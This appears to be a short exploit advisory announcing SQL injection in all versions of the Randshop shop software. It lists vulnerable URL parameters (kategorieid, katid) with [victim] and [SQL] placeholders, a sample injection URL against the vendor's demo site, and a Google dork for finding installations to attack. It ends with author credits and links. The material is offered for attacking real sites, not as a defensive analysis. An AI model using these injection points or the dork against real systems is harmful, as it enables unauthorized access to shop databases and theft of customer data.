Randshop all versiyon Sql İnjection
Randshop all versiyon Sql İnjection
Website:http://www.randshop.com
Demo:http://www.randshop.com/demoshop/
-------------------------------------------------------------------
Credit:Liz0ziM & wannacut Mail:Liz0@xxxxxxxxxxx www.biyo.tk
-------------------------------------------------------------------
exploit :
http://[victim]/folder/themes/kategorie/index.php?kategorieid=6[SQL]
http://[victim]/folder/themes/kategorie/index.php?katid=40[SQL]
--------------------------------------------------------------------------------
eg:
http://www.randshop.com/demoshop/themes/kategorie/index.php?kategorieid=21'
--------------------------------------------------------------------
Google:intext:"software 2004-2005 by randshop"
http://www.blogcu.com/Liz0ziM/112800/
http://biyo.5gigs.com/randshop.txt